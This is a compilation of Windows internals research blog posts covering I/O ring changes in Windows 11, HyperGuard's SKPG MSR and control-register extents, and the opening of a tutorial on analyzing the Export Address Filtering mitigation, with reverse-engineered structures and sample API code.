One Year to I/O Ring: What Changed?

It’s been just over a year since the first version of I/O ring was introduced into Windows. The initial version was introduced in Windows 21H2 and I did my best to document it here, with a comparison to the Linux io_uring here. Microsoft also documented the Win32 functions. Since that initial version this feature progressed and received pretty significant changes and updates, so it deserves a follow-up post documenting all of them and explaining them in more detail.

New Supported Operations

Looking at the changes, the first and most obvious thing we can see is that two new operations are now supported – write and flush:

These allow using the I/O ring to perform write and flush operations. These new operations are processed and handled similarly to the read operation that’s been supported since the first version of I/O rings and forwarded to the appropriate I/O functions. New wrapper functions were added to KernelBase.dll to queue requests for these operations: BuildIoRingWriteFile and BuildIoRingFlushFile, and their definitions can be found in the ioringapi.h header file (available in the preview SDK):

STDAPI
BuildIoRingWriteFile (
    _In_ HIORING ioRing,
    IORING_HANDLE_REF fileRef,
    IORING_BUFFER_REF bufferRef,
    UINT32 numberOfBytesToWrite,
    UINT64 fileOffset,
    FILE_WRITE_FLAGS writeFlags,
    UINT_PTR userData,
    IORING_SQE_FLAGS sqeFlags
);

STDAPI
BuildIoRingFlushFile (
    _In_ HIORING ioRing,
    IORING_HANDLE_REF fileRef,
    FILE_FLUSH_MODE flushMode,
    UINT_PTR userData,
    IORING_SQE_FLAGS sqeFlags
);

Similarly to BuildIoRingReadFile, both of these build the submission queue entry with the requested OpCode and add it to the submission queue. Obviously, there are different flags and options needed for the new operations, such as the flushMode for flush operations or writeFlags for writes. To handle that, the NT_IORING_SQE structure now contains a union for the input data that gets interpreted according to the requested OpCode – the new structure is available in the public symbols and also at the end of this post.

One small kernel change that was added to support write operations can be seen in IopIoRingReferenceFileObject:

There are a few new arguments and an additional call to ObReferenceFileObjectForWrite. Probing of different buffers across the various functions also changed depending on the operations type.

User Completion Event

Another interesting change that was introduced as well is the ability to register a user event to be notified for every new completed operation. Unlike the I/O Ring’s CompletionEvent, that only gets signaled when all operations are complete, the new optional user event will be signaled for every newly completed operation, allowing the application to process the results as they are being written to the completion queue.

To support this new functionality, another system call was created: NtSetInformationIoRing:

NTSTATUS
NtSetInformationIoRing (
    HANDLE IoRingHandle,
    ULONG IoRingInformationClass,
    ULONG InformationLength,
    PVOID Information
);

Like other NtSetInformation* routines, this function receives a handle to the IoRing object, an  information class, length and data. Only one information class is currently valid: 1. The IORING_INFORMATION_CLASS structure is unfortunately not in the public symbols so we can’t know what it’s official name is, but I’ll call it IoRingRegisterUserCompletionEventClass. Even though only one class is currently supported, there might be other information classes supported in the future. One interesting thing here is that the function uses a global array IopIoRingSetOperationLength to retrieve the expected information length for each information class:

The array currently only has two entries: 0, which isn’t actually a valid class and returns a length of 0, and entry 1 which returns an expected size of 8. This length matches the function’s expectation to receive an event handle (HANDLEs are 8 bytes on x64). This could be a hint that more information classes are planned in the future, or just a different coding choice.

After the necessary input checks, the function references the I/O ring whose handle was sent to the function. Then, if the information class is IoRingRegisterUserCompletionEventClass, calls IopIoRingUpdateCompletionUserEvent with the supplied event handle. IopIoRingUpdateCompletionUserEvent will reference the event and place the pointer in IoRingObject->CompletionUserEvent. If no event handle is supplied, the CompletionUserEvent field is cleared:

The RE Corner

On a side note, this function might look rather large and mildly threatening, but most of it is simply synchronization code to guarantee that only one thread can edit the CompletionUserEvent field of the I/O ring at any point and prevent race conditions. And in fact, the compiler makes the function look larger than it actually is since it unpacks macros, so if we try to reconstruct the source code this function would look much cleaner:

NTSTATUS
IopIoRingUpdateCompletionUserEvent (
    PIORING_OBJECT IoRingObject,
    PHANDLE EventHandle,
    KPROCESSOR_MODE PreviousMode
    )
{
    PKEVENT completionUserEvent;
    HANDLE eventHandle;
    NTSTATUS status;
    PKEVENT oldCompletionEvent;
    PKEVENT eventObj;

    completionUserEvent = 0;
    eventHandle = *EventHandle;
    if (!eventHandle ||
        (eventObj = 0,
        status = ObReferenceObjectByHandle(
                 eventHandle, PAGE_READONLY, ExEventObjectType, PreviousMode, &eventObj, 0),
        completionUserEvent = eventObj,
        !NT_SUCCESS(status))
    {
        KeAcquireSpinLockRaiseToDpc(&IoRingObject->CompletionLock);
        oldCompletionEvent = IoRingObject->CompletionUserEvent;
        IoRingObject->CompletionUserEvent = completionUserEvent;
        KeReleaseSpinLock(&IoRingObject->CompletionLock);
        if (oldCompletionEvent)
        {
            ObDereferenceObjectWithTag(oldCompletionEvent, 'tlfD');
        }
        return STATUS_SUCCESS;
    }
    return status;
}

That’s it, around six lines of actual code. But, that is not the point of this post, so let’s get back to the topic at hand: the new CompletionUserEvent.

Back to the User Completion Event

The next time we run into CompletionUserEvent is when an IoRing entry is completed, in IopCompleteIoRingEntry:

While the normal I/O ring completion event is only signaled once all operations are complete, the CompletionUserEvent is signaled under different conditions. Looking at the code, we see the following check:

Every time an I/O ring operation is complete and written into the completion queue, the CompletionQueue->Tail field gets incremented by one (referenced here as newTail). The CompletionQueue->Head field contains the index of the last completion entry that was written, and gets incremented every time the application processes another entry (If you use PopIoRingCompletion it’ll do that internally, otherwise you need to increment it yourself). So, (newTail - Head) % CompletionQueueSize calculates the number of completed entries that have not yet been processed by the application. If that amount is one, that means that the application has processed all completed entries except the latest one, that is being completed now. In that case, the function will reference the CompletionUserEvent and then call KeSetEvent to signal it.

This behavior allows the application to follow along with the completion of all its submitted operations by creating a thread whise purpose is to wait on the user event and process every newly completed entry just as it’s completed. This makes sure that the Head and Tail of the completion queue are always the same, so the next entry to be completed will signal the event, the entry will process the entry, and so on. This way the main thread of the application can keep doing other work, but the I/O operations all get processed as soon as possible by the worker thread.

Of course, this is not mandatory. An application might choose to not register a user event and simply wait for the completion of all events. But the two events allow different applications to choose the option that works best for them, creating an I/O completion mechanism that can be adjusted to suit different needs.

There is a function in KernelBase.dll to register the user completion event: SetIoRingCompletionEvent. We can find its signature in ioringapi.h:

STDAPI
SetIoRingCompletionEvent (
    _In_ HIORING ioRing,
    _In_ HANDLE hEvent
);

Using this new API and knowing how this new event operates, we can build a demo application that would look something like this:

HANDLE g_event;

DWORD
WaitOnEvent (
    LPVOID lpThreadParameter
    )
{
    HRESULT result;
    IORING_CQE cqe;

    WaitForSingleObject(g_event, INFINITE);
    while (TRUE)
    {
        //
        // lpThreadParameter is the handle to the ioring
        //
        result = PopIoRingCompletion((HIORING)lpThreadParameter, &cqe);
        if (result == S_OK)
        {
            /* do things */
        }
        else
        {
            WaitForSingleObject(g_event, INFINITE);
            ResetEvent(g_event);
        }
    }
    return 0;
}

int
main ()
{
    HRESULT result;
    HIORING ioring = NULL;
    IORING_CREATE_FLAGS flags;

    flags.Required = IORING_CREATE_REQUIRED_FLAGS_NONE;
    flags.Advisory = IORING_CREATE_ADVISORY_FLAGS_NONE;
    result = CreateIoRing(IORING_VERSION_3, flags, 0x10000, 0x20000, &ioring);

    /* Queue operations to ioring... */

    //
    // Create user completion event, register it to the ioring
    // and create a thread to wait on it and process completed operations.
    // The ioring handle is sent as an argument to the thread.
    //
    g_event = CreateEvent(NULL, FALSE, FALSE, NULL);
    result = SetIoRingCompletionEvent(handle, g_event);
    thread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)WaitOnEvent, ioring, 0, &threadId);
    result = SubmitIoRing(handle, 0, 0, &submittedEntries);

    /* Clean up... */

    return 0;
}

Drain Preceding Operations

The user completion event is a very cool addition, but it’s not the only waiting-related improvement to I/O rings. Another one can be found by looking at the NT_IORING_SQE_FLAGS enum:

typedef enum _NT_IORING_SQE_FLAGS
{
    NT_IORING_SQE_FLAG_NONE = 0x0,
    NT_IORING_SQE_FLAG_DRAIN_PRECEDING_OPS = 0x1,
} NT_IORING_SQE_FLAGS, *PNT_IORING_SQE_FLAGS;

Looking through the code, we can find a check for NT_IORING_SQE_FLAG_DRAIN_PRECEDING_OPS right in the beginning of IopProcessIoRingEntry:

This check happens before any processing is done, to check if the submission queue entry contains the NT_IORING_SQE_FLAG_DRAIN_PRECEDING_OPS flag. If so, IopIoRingSetupCompletionWait is called to setup the wait parameters. The function signature looks something like this:

NTSTATUS
IopIoRingSetupCompletionWait (
    _In_ PIORING_OBJECT IoRingObject,
    _In_ ULONG SubmittedEntries,
    _In_ ULONG WaitOperations,
    _In_ BOOL SetupCompletionWait,
    _Out_ PBYTE CompletionWait
);

Inside the function there are a lot of checks and calculations that are both very technical and very boring, so I’ll spare myself the need to explain them and you the need to read through the exhausting explanation and skip to the good parts. Essentially, if the function receives -1 as the WaitOperations, it will ignore the SetupCompletionWait argument and calculate the number of operations that have already been submitted and processed but not yet completed. That number gets placed in IoRingObject->CompletionWaitUntil. It also sets IoRingObject->SignalCompletionEvent to TRUE and returns TRUE in the output argument CompletionWait.

If the function succeeded, IopProcessIoRingEntry will then call IopIoRingWaitForCompletionEvent, which will until IoRingObject->CompletionEvent is signaled. Now is the time to go back to the check we’ve seen earlier in IopCompleteIoRingEntry:

If SignalCompletionEvent is set (which it is, because IopIoRingSetupCompletionWait set it) and the number of completed events is equal to IoRingObject->CompletionWaitUntil, IoRingObject->CompletionEvent will get signaled to mark that the pending events are all completed. SignalCompletionEvent also gets cleared to avoid signaling the event again when it’s not requested.

When called from IopProcessIoRingEntry, IopIoRingWaitForCompletionEvent receives a timeout of NULL, meaning that it’ll wait indefinitely. This is something that should be taken under consideration when using the NT_IORING_SQE_FLAG_DRAIN_PRECEDING_OPS flag.

So to recap, setting the NT_IORING_SQE_FLAG_DRAIN_PRECEDING_OPS flag in a submission queue entry will make sure all preceding operations are completed before this entry gets processed. This might be needed in certain cases where one I/O operation relies on an earlier one.

But waiting on pending operations happens in one more case: When submitting an I/O ring. In my first post about I/O rings last year, I defined the NtSubmitIoRing signature like this:

NTSTATUS
NtSubmitIoRing (
    _In_ HANDLE Handle,
    _In_ IORING_CREATE_REQUIRED_FLAGS Flags,
    _In_ ULONG EntryCount,
    _In_ PLARGE_INTEGER Timeout
    );

My definition ended up not being entirely accurate. The more correct name for the third argument would be WaitOperations, so the accurate signature is:

NTSTATUS
NtSubmitIoRing (
    _In_ HANDLE Handle,
    _In_ IORING_CREATE_REQUIRED_FLAGS Flags,
    _In_opt_ ULONG WaitOperations,
    _In_opt_ PLARGE_INTEGER Timeout
    );

Why does this matter? Because the number you pass into WaitOperations isn’t used to process the ring entries (they are processed entirely based on SubmissionQueue->Head and SubmissionQueue->Tail), but to request the number of operations to wait on. So, if WaitOperations is not 0, NtSubmitIoRing will call IopIoRingSetUpCompletionWait before doing any processing:

However, it calls the function with SetupCompletionWait=FALSE, so the function won’t actually setup any of the wait parameters, but only perform the sanity checks to see if the number of wait operations is valid. For example, the number of wait operations can’t be higher than the number of operations that were submitted. If the checks fail, NtSubmitIoRing won’t process any of the entries and will return an error, usually STATUS_INVALID_PARAMETER_3.

Later, we see both functions again after operations have been processed:

IopIoRingSetupCompletionWait is called again to recalculate the number of operations that need to be waited on, taking into consideration any operations that might have already been completed (or waited on already if any of the SQEs had the flag mentioned earlier). Then IopIoRingWaitForCompletionEvent is called to wait on IoRingObject->CompletionEvent until all requested events have been completed.
In most cases applications will choose to either send 0 as the WaitOperations argument or set it to the total number of submitted operations, but there may be cases where an application could want to only wait on part of the submitted operations, so it can choose a lower number to wait on.

Looking at Bugs

Comparing the same piece of code in different builds is a fun way of finding bugs that were fixed. Sometimes these are security vulnerabilities that gםt patched, sometimes just regular old bugs that can affect the stability or reliability of the code. The I/O ring code in the kernel received a lot of modifications over the past year, so this seems like a good chance to go hunting for old bugs.

One bug that I’d like to focus on here is pretty easy to spot and understand, but is a fun example for the way different parts of the system that seem entirely unrelated can clash in unexpected ways. This is a functional (not security) bug that prevented WoW64 processes from using some of the I/O ring features.

We can find evidence of this bug when looking at IopIoRingDispatchRegisterBuffers and IopIoRingispatchRegisterFiles. When looking at the new build we can see a piece of code that wasn’t there in earlier versions:

This is checking whether the process that is registering the buffers or files is a WoW64 process – a 32-bit process running on top of a 64-bit system. Since Windows now supports ARM64, this WoW64 process can now be either a x86 application or an ARM32 one.

Looking further ahead can show us why this information matters here. Later on, we see two cases where isWow64 is checked:

This first case is when the array size is being calculated to check for invalid sizes if caller is UserMode.

This second case happens when iterating over the input buffer to register the buffers in the array that will be stored in the I/O ring object. In this case it’s slightly harder to understand what we’re looking at because of the way the structures are handled here, but if we look at the disassembly it might become a bit clearer:

The block on the left is the WoW64 case and the block on the right is the native case. Here we can see the difference in the offset that is being accessed in the bufferInfo variable (r8 in the disassembly). To get some context, bufferInfo is read from the submission queue entry:

bufferInfo = Sqe->RegisterBuffers.Buffers;

When registering a buffer, the SQE will contain a NT_IORING_OP_REGISTER_BUFFERS structure:

typedef struct _NT_IORING_OP_REGISTER_BUFFERS
{
    /* 0x0000 */ NT_IORING_OP_FLAGS CommonOpFlags;
    /* 0x0004 */ NT_IORING_REG_BUFFERS_FLAGS Flags;
    /* 0x000c */ ULONG Count;
    /* 0x0010 */ PIORING_BUFFER_INFO Buffers;
} NT_IORING_OP_REGISTER_BUFFERS, *PNT_IORING_OP_REGISTER_BUFFERS;

The sub-structures are all in the public symbols so I won’t put them all here, but the one to focus on in this case is IORING_BUFFER_INFO:

typedef struct _IORING_BUFFER_INFO
{
    /* 0x0000 */ PVOID Address;
    /* 0x0008 */ ULONG Length;
} IORING_BUFFER_INFO, *PIORING_BUFFER_INFO; /* size: 0x0010 */

This structure contains an address and a length. The address is of type PVOID, and this is where the bug lies. A PVOID doesn’t have a fixed size across all systems. It is a pointer, and therefore its size depends on the size of a pointer on the system. On 64-bit systems that’s 8 bytes, and on 32-bit systems that’s 4 bytes. However, WoW64 processes aren’t fully aware that they are running on a 64-bit system. There is a whole mechanism put in place to emulate a 32-bit system for the process to allow 32-bit applications to execute normally on 64-bit hardware. That means that when the application calls BuildIoRingRegisterBuffers to create the array of buffers, it calls the 32-bit version of the function, which uses 32-bit structures and 32-bit types. So instead of using an 8-byte pointer, it’ll use a 4-byte pointer, creating an IORING_BUFFER_INFO structure that looks like this:

typedef struct _IORING_BUFFER_INFO
{
    /* 0x0000 */ PVOID Address;
    /* 0x0004 */ ULONG Length;
} IORING_BUFFER_INFO, *PIORING_BUFFER_INFO; /* size: 0x008 */

This is, of course, not the only case where the kernel receives pointer-sized arguments from a user-mode caller and there is a mechanism meant to handle these cases. Since the kernel doesn’t support 32-bit execution, the WoW64 emulation later is in charge of translating system call input arguments from the 32-bit sizes and types to the 64-bit types expected by the kernel. However in this case, the buffer array is not sent as an input argument to a system call. It is written into the shared section of the I/O ring that is read directly by the kernel, never going through the WoW64 translation DLLs. This means no argument translation is done on the array, and the kernel directly reads an array that was meant for a 32-bit kernel, where the Length argument is not at the expected offset. In the early versions of I/O ring this meant that the kernel always skipped the buffer length and interpreted the next entry’s address as the last entry’s length, leading to bugs and errors.

In newer builds, the kernel is aware of the differently shaped structure used by WoW64 processes, and interprets it correctly: It assumes that the size of each entry is 8 bytes instead of 0x10, and reads only the first 4 bytes as the address and the next 4 bytes as the length.

The same issue existed when pre-registering file handles, since a HANDLE is also the size of a pointer. IopIoRingDispatchRegisterFiles now has the same checks and processing to allow WoW64 processes to successfully register file handles as well.

Other Changes

There are a couple of smaller changes that aren’t large or significant enough to receive their own section of this post but still deserve an honorable mention:

  • The successful creation of a new I/O ring object will generate an ETW event containing all the initialization information in the I/O ring.
  • IoringObject->CompletionEvent received a promotion from NotificationEvent type to SynchronizationEvent.
  • Current I/O ring version is 3, so new rings created for recent builds should use this version.
  • Since different versions of I/O ring support different capabilities and operations, KernelBase.dll exports a new function: IsIoRingOpSupported. It receives the HIORING handle and the operation number, and returns a boolean indicating whether the operation is supported on this version.

Data Structures

One more exciting thing happened in Windows 11 22H2 (build 22577): nearly all the internal I/O ring structures are available in the public symbols! This means there is no longer a need to painfully reverse engineer the structures and try to guess the field names and their purposes. Some of the structures received major changes since 21H2, so not having to reverse engineer them all over again is great.

Since the structures are in the symbols there is no real need to add them here. However, structures from the public symbols aren’t always easy to find through a simple Google search – I highly recommend trying GitHub search instead, or just directly using ntdiff. At some point people will inevitably search for some of these data structures, find the REd structures in my old post, which are no longer accurate, and complain that they are out of date. To avoid that at least temporarily, I’ll only post here the updated versions of the structures that I had in the old post but will highly encourage you to get the up-to-date structures from the symbols – the ones here are bound to change soon enough (edit: one build later, some of them already did). So, here are some of the structures from Windows 11 build 22598:

typedef struct _NT_IORING_INFO
{
    IORING_VERSION IoRingVersion;
    NT_IORING_CREATE_FLAGS Flags;
    ULONG SubmissionQueueSize;
    ULONG SubmissionQueueRingMask;
    ULONG CompletionQueueSize;
    ULONG CompletionQueueRingMask;
    PNT_IORING_SUBMISSION_QUEUE SubmissionQueue;
    PNT_IORING_COMPLETION_QUEUE CompletionQueue;
} NT_IORING_INFO, *PNT_IORING_INFO;

typedef struct _NT_IORING_SUBMISSION_QUEUE
{
    ULONG Head;
    ULONG Tail;
    NT_IORING_SQ_FLAGS Flags;
    NT_IORING_SQE Entries[1];
} NT_IORING_SUBMISSION_QUEUE, *PNT_IORING_SUBMISSION_QUEUE;

typedef struct _NT_IORING_SQE
{
    enum IORING_OP_CODE OpCode;
    enum NT_IORING_SQE_FLAGS Flags;
    union
    {
        ULONG64 UserData;
        ULONG64 PaddingUserDataForWow;
    };
    union
    {
        NT_IORING_OP_READ Read;
        NT_IORING_OP_REGISTER_FILES RegisterFiles;
        NT_IORING_OP_REGISTER_BUFFERS RegisterBuffers;
        NT_IORING_OP_CANCEL Cancel;
        NT_IORING_OP_WRITE Write;
        NT_IORING_OP_FLUSH Flush;
        NT_IORING_OP_RESERVED ReservedMaxSizePadding;
    };
} NT_IORING_SQE, *PNT_IORING_SQE;

typedef struct _IORING_OBJECT
{
    USHORT Type;
    USHORT Size;
    NT_IORING_INFO UserInfo;
    PVOID Section;
    PNT_IORING_SUBMISSION_QUEUE SubmissionQueue;
    PMDL CompletionQueueMdl;
    PNT_IORING_COMPLETION_QUEUE CompletionQueue;
    ULONG64 ViewSize;
    BYTE InSubmit;
    ULONG64 CompletionLock;
    ULONG64 SubmitCount;
    ULONG64 CompletionCount;
    ULONG64 CompletionWaitUntil;
    KEVENT CompletionEvent;
    BYTE SignalCompletionEvent;
    PKEVENT CompletionUserEvent;
    ULONG RegBuffersCount;
    PIORING_BUFFER_INFO RegBuffers;
    ULONG RegFilesCount;
    PVOID* RegFiles;
} IORING_OBJECT, *PIORING_OBJECT;

One structure that isn’t in the symbols is the HIORING structure that represents the ioring handle in KernelBase. That one slightly changed since 21H2 so here is the reverse engineered 22H2 version:

typedef struct _HIORING
{
    HANDLE handle;
    NT_IORING_INFO Info;
    ULONG IoRingKernelAcceptedVersion;
    PVOID RegBufferArray;
    ULONG BufferArraySize;
    PVOID FileHandleArray;
    ULONG FileHandlesCount;
    ULONG SubQueueHead;
    ULONG SubQueueTail;
} HIORING, *PHIORING;

Conclusion

This feature barely just shipped a few months ago, but it’s already receiving some very interesting additions and improvements, aiming to make it more attractive to I/O-heavy applications. It’s already at version 3, and it’s likely we’ll see a few more versions coming in the near future, possibly supporting new operation types or extended functionality. Still, no applications seem to use this mechanism yet, at least on Desktop systems.

This is one of the more interesting additions to Windows 11, and just like any new piece of code it still has some bugs, like the one I showed in this post. It’s worth keeping an eye on I/O rings to see how they get used (or maybe abused?) as Windows 11 becomes more widely adapted and applications begin using all the new capabilities it offers.

HyperGuard Part 3 – More SKPG Extents

Hi all! And welcome to part 3 of the HyperGuard chronicles!

In the previous blog post I introduced SKPG extents – the data structures that describe the memory ranges and system components that should be monitored by HyperGuard. So far, I only covered the initialization extent and various types of memory extents, but those are just the beginning. In this post I will cover the rest of the extent types and show how they are used by HyperGuard to protect other areas of the system.

The next extent group to look into is MSR and Control Register extents:

MSR and Control Register Extents

This group contains the following extent types:

  • 0x1003: SkpgExtentMsr
  • 0x1006: SkpgExtentControlRegister
  • 0x100C: SkpgExtentExtendedControlRegister

These extent types are received from the normal kernel, but they are never added into the array at the end of the SKPG_CONTEXT or get validated during the runtime checks that I’ll describe in one of the next posts. Instead, they are used in yet another part of SKPG initialization.

After initializing the SKPG_CONTEXT in SkpgInitializeContext, SkpgConnect performs an IPI (Inter-Processor Interrupt). It performs this IPI by calling SkeGenericIpiCall with a target function and input data, and the function will call the target function on every processor and send the requested data. In this case, the target function is SkpgxInstallIntercepts and the input data contains the number of input extents and the matching array:

I will go over intercepts in a lot more detail in a future blog post, but to give some necessary context: SKPG can ask the hypervisor to intercept certain actions in the system, like memory access, register access or instructions. HyperGuard uses that ability to intercept access to certain MSRs and Control Registers (and other things, which I will talk about later) to prevent malicious modifications. HyperGuard uses the input extents to choose which MSRs and Control Registers to intercept, out of the list of accepted options.

Since each processor has its own set of MSRs and registers, HyperGuard needs to intercept the requested one on all processors. Therefore, SkpgxInstallIntercepts is called through an IPI, to make sure it’s called in the context of each processor.

Once in SkpgxInstallIntercepts, the function iterates over the array of input extents and handles the three types included in this group based on the data supplied in them. If you remember, each extent contains 0x18 bytes of type-specific data. For this group, this data contains the number of the MSR/Register to be intercepted as well as the processor number that it should be intercepted on. This means that there might be more that one input extent for each MSR or control register, each for a different processor number. Or MSRs and control registers might only be intercepted on certain processors but not on others, if that is what the normal kernel requested. The data structure in the input extent for MSRs and control register extents looks something like this:

typedef struct _MSR_CR_DATA
{
    ULONG64 Mask;
    ULONG64 Value;
    ULONG RegisterNumber;
    ULONG ProcessorNumber;
} MSR_CR_DATA, *PMSR_CR_DATA;

While iterating over the extents, the function checks if the extent type is of one of the three in this group, and if so whether the processor number in the extent matches the current processor. If so, it checks if the number of the MSR or control register matches one of the accepted ones. If the extent matches one of the accepted registers, a mask is fetched from an array in the SKPRCB – this array contains the needed masks for all accepted MSRs and control registers so the hypervisor can be asked to intercept them. All masks are collected, and when all extents have been examined the final mask is sent to ShvlSetRegisterInterceptMasks to be installed. The mask that is used to install the intercepts is the union HV_REGISTER_CR_INTERCEPT_CONTROL. It is documented and can be found here.

Now that the general process is covered, we can look into the accepted MSRs and control registers and understand why HyperGuard might want to protect them from modifications, starting from the MSRs:

SkpgExtentMsr

Patching certain MSRs is a popular operation for exploits and rootkits, allowing them to do things such as hooking system calls or disabling security features. Some of those MSRs are already periodically monitored by PatchGuard, but there are benefits to intercepting them through HyperGuard that I will cover later. The list of MSRs that can be intercepted keeps growing over time and receives new additions as new features and registers get added to CPUs, such as the implementation of CET which added multiple MSRs that might be a target for attackers. As of Windows 11 build 22598, the MSRs that can be intercepted by SKPG are:

  1. IA32_EFER (0xC0000080) – among other things, this MSR contains the NX bit, enforcing a mitigation that doesn’t allow code execution in addresses that aren’t specifically marked as executable. It also contains flags related to virtualization support.
  2. IA32_STAR (0xC0000081) – contains the address of the x86 system call handler.
  3. IA32_LSTAR (0xC0000082) – contains the address of the x64 system call handler – should normally be pointing to nt!KiSystemCall64.
  4. IA32_CSTAR (0xC0000083) – contains the address of the system call handler on x64 when running in compatibility mode – should normally be pointing to nt!KiSystemCall32.
  5. IA32_SFMASK (0xC0000084) – system call flags mask. Any bit set here when a system call is executed will be cleared from EFLAGS.
  6. IA32_TSC_AUX (0xC0000103) – usage depends on the operating system, but this MSR is generally used to store a signature, to be read together with a time stamp.
  7. IA32_APIC_BASE (0x1B) – contains the APIC base address.
  8. IA32_SYSENTER_CS (0x174) – contains the CS value for ring 0 code when performing system calls with SYSENTER.
  9. IA32_SYSENTER_ESP (0x175) – contains the stack pointer for the kernel stack when performing system calls with SYSENTER.
  10. IA32_SYSENTER_EIP (0x176) – contains the EIP value for ring 0 entry when performing system calls with SYSENTER.
  11. IA32_MISC_ENABLE (0x1A0) – controls multiple processor features, such as Fast Strings disable, performance monitoring and disable of the XD (no-execute) bit.
  12. MSR_IA32_S_CET (0x6A2) – controls kernel mode CET setting.
  13. IA32_PL0_SSP (0x6A4) – contains the ring 0 shadow stack pointer.
  14. IA32_PL1_SSP (0x6A5) – contains the ring 1 shadow stack pointer.
  15. IA32_PL2_SSP (0x6A6) – contains the ring 2 shadow stack pointer.
  16. IA32_INTERRUPT_SSP_TABLE_ADDR (0x6A8) – contains a pointer to the interrupt shadow stack table.
  17. IA32_XSS (0xDA0) – contains a mask to be used when XSAVE and XRESTOR instructions are called in kernel-mode. For example, it controls the saving and loading of the registers used by Intel Processor Trace (IPT).

SkpgExtentControlRegister

By modifying certain control registers an attacker can disable security features or gain control of execution. Currently SKPG supports intercepts of two control registers:

  1. CR0 – controls certain hardware configuration such as paging, protected mode and write protect.
  2. CR4 – controls the configuration of different hardware features. For example, driver signature enforcement, SMEP and UMIP bits control security features that make CR4 an interesting target for attackers using an arbitrary write exploit.

SkpgExtentExtendedControlRegister

Currently only one extended control register exists – XCR0. It’s used to toggle storing or loading of extended registers such as AVX, ZMM and CET registers, and can be intercepted and protected by SKPG.

Installing the Intercepts

Now that we know that registers can be intercepted and why, we can get back and look at the installation of the intercepts through ShvlSetRegisterInterceptMasks. The function receives a HV_REGISTER_CR_INTERCEPT_CONTROL mask to know which intercepts to install, as well as the values for a few of the intercepted registers – CR0, CR4 and IA32_MISC_ENABLE MSR. These are all placed in a structure that is passed into the function, which looks like this:

struct _REGISTER_INTERCEPT_INFORMATION
{
    HV_REGISTER_CR_INTERCEPT_CONTROL InterceptControl;
    ULONG64 Cr0Value;
    ULONG64 Cr4Value;
    ULONG64 Ia32MiscEnableValue;
} REGISTER_INTERCEPT_INFORMATION, *PREGISTER_INTERCEPT_INFORMATION;

The InterceptControl mask is built while iterating over the input extents, and the values for CR0, CR4 and IA32_MISC_ENABLE are read from the SKPRCB (their values, together with the values for all other potentially-intercepted registers, are placed there in SkeInitSystem, triggered from a secure call with code SECURESERVICE_PHASE3_INIT).

This structure is sent to ShvlSetRegisterInterceptMasks which in turn calls ShvlSetVpRegister on each of the four values in the input structure to register an intercept. Setting the register values is done by initiating a fast hypercall with a code of HvCallSetVpRegisters (0x51), sending on four arguments (for anyone interested, all hypercall values are documented here). The last two arguments are of types HV_REGISTER_NAME and HV_REGISTER_VALUE – these types are documented so it’s easy to see what registers are being set:

Looking at the function, we see that it’s setting the required values for CR0, CR4 and IA32_MISC_ENABLE, and finally setting the mask for intercept control, so from this point all requested registers are intercepted by the hypervisor and any access to them will be forwarded to the SKPG intercept routine.

Secure VA Translation Extents

In the previous post I introduced the secure extents – extents indicating VTL1 memory or data structures to be protected. I also covered memory extents, including the secure memory extents. Here is another kind of secure extents, which are initialized internally in the secure kernel, without using input extents from VTL0. They are called Secure VA Translation Extents and are initialized inside SkpgCreateSecureVaTranslationExtents. These extents are used to protect Virtual->Physical address translations for different pages or memory regions that are a common target for attack:

  • 0x100B: SkpgExtentProcessorMode
  • 0x100E: SkpgExtentLoadedModule
  • 0x100F: SkpgExtentProcessorState
  • 0x1010: SkpgExtentKernelCfgBitmap
  • 0x1011: SkpgExtentZeroPage
  • 0x1012: SkpgExtentAlternateInvertedFunctionTable
  • 0x1015: SkpgExtentSecureExtensionTable
  • 0x1017: SkpgExtentKernelVAProtection
  • 0x1019: SkpgExtentSecurePool

Though they are called secure extents, the data they protect is mostly VTL0 data, such as the VTL0 mapping of the KCFG bitmap or the inverted function table. The exact validations done differ between the types: for example, the zero page should never be mapped so a successful virtual->physical address translation of the zero page should not be acceptable, while the kernel CFG bitmap should have valid translations but the VTL0 mapping of those pages should always be read-only.

Looking at SkpgCreateSecureVaTranslationExtents, we can see that the extents are initialized with no input data or memory ranges:

This is because all of these extents correlate to specific data structures which are all initialized elsewhere so the data doesn’t need to be part of the extent itself, so the type is the only part that needs to be set. We can also see that some of these extents are only initialized when KCFG is enabled, since without it they are not needed. I will cover the checks done for each of these extents in a later blog post, which will describe SKPG extent verification.

Finally, if HotPatching is enabled, two more extents are added, both with type SkpgExtentExtensionTable:

These extents protect the SkpgSecureExtension and SkpgNtExtension variables, which keep track of HotPatching data.

Per-Processor Extents

There are two more extents that are processor-specific, since the data they protect exists separately in each processor. However, unlike the MSR and Control Register extents, no intercepts need to be installed and no function needs to be executed on all processors (for now). These extents are also received from the normal kernel and added to the array of extents in the SKPG_CONTEXT structure. The data received for each of these two extents includes base address, limit and a processor number, so multiple entries might exist for these extent types, with different processor numbers:

  • 0x1004: SkpgExtentIdt
  • 0x1005: SkpgExtentGdt

These extents contain the memory range for the GDT and IDT tables on each processor, so HyperGuard will protect them from malicious modifications.

Unused Extents

Extent types 0x1007, 0x1008, 0x1013 and 0x1018 never get initialized anywhere in SecureKernel.exe and don’t seem to be used anywhere. They may be deprecated or not fully implemented yet.

An Exercise in Dynamic Analysis

Analyzing the PayloadRestrictions.dll Export Address Filtering

This post is a bit different from my usual ones. It won’t cover any new security features or techniques and won’t share any novel security research. Instead, it will guide you through the process of analyzing an unknown mitigation through a real-life example in Windows Defender Exploit Guard (formerly EMET). Because the goal here is to show a step-by-step, real life research process, the post will be a bit disorganized and will follow a more organic and messy train of thought.

A brief explanations of the Windows Defender Exploit Guard: formerly known as EMET, this is a DLL that gets injected on demand and implements several security mitigations such as Export Address Filtering, Import Address Filtering, Stack Integrity Validations, and more. These are all disabled by default and need to be manually enabled in the Windows security settings, either for a specific process or for the whole system. Since it was acquired by Microsoft, these mitigations are implemented in PayloadRestrictions.dll, which can be found in C:\Windows\System32.

This post will follow one of these mitigations, named Export Address Filtering (or EAF). This tutorial will demonstrate a step-by-step guide for analyzing this mitigation, using both dynamic analysis in WinDbg and static analysis in IDA and Hex Rays. I’ll try to highlight the things that should be focused on when analyzing a mitigation and show that even with partial information we can reach useful conclusions and learn about this feature.

First, we’ll enable EAF in calc.exe in the Windows Security settings:

We don’t know anything about this mitigation yet other than that one line descriptions in the security settings, so we’ll start by running calc.exe under a debugger to see what happens. Immediately we can see PayloadRestrictions.dll get loaded into the process:

And almost right away we get a guard page violation:

What is in this mysterious address and why does accessing it throw a guard page violation?

To start finding out the answer to the first question  we can run !address to get a few more details about the address causing the exception:

!address 00007ffe`3da6416c
 
Usage:                  Image
